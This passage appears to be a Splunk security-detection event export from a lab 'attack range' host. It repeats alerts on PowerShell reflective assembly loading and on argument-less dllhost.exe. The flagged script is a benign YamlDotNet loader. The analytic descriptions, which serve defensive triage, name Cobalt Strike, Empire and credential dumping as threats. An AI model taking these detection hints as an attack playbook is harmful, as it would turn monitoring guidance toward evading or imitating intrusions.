\"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664992800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664992800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="5692", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664996133, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T17:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T17:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664996133, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T17:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T17:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664996133, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T17:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T17:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664996133, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T17:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T17:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664989200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664989200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="3812", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664989200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664989200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0xee4", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664992532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T16:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T16:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664992532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T16:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T16:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664992532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent 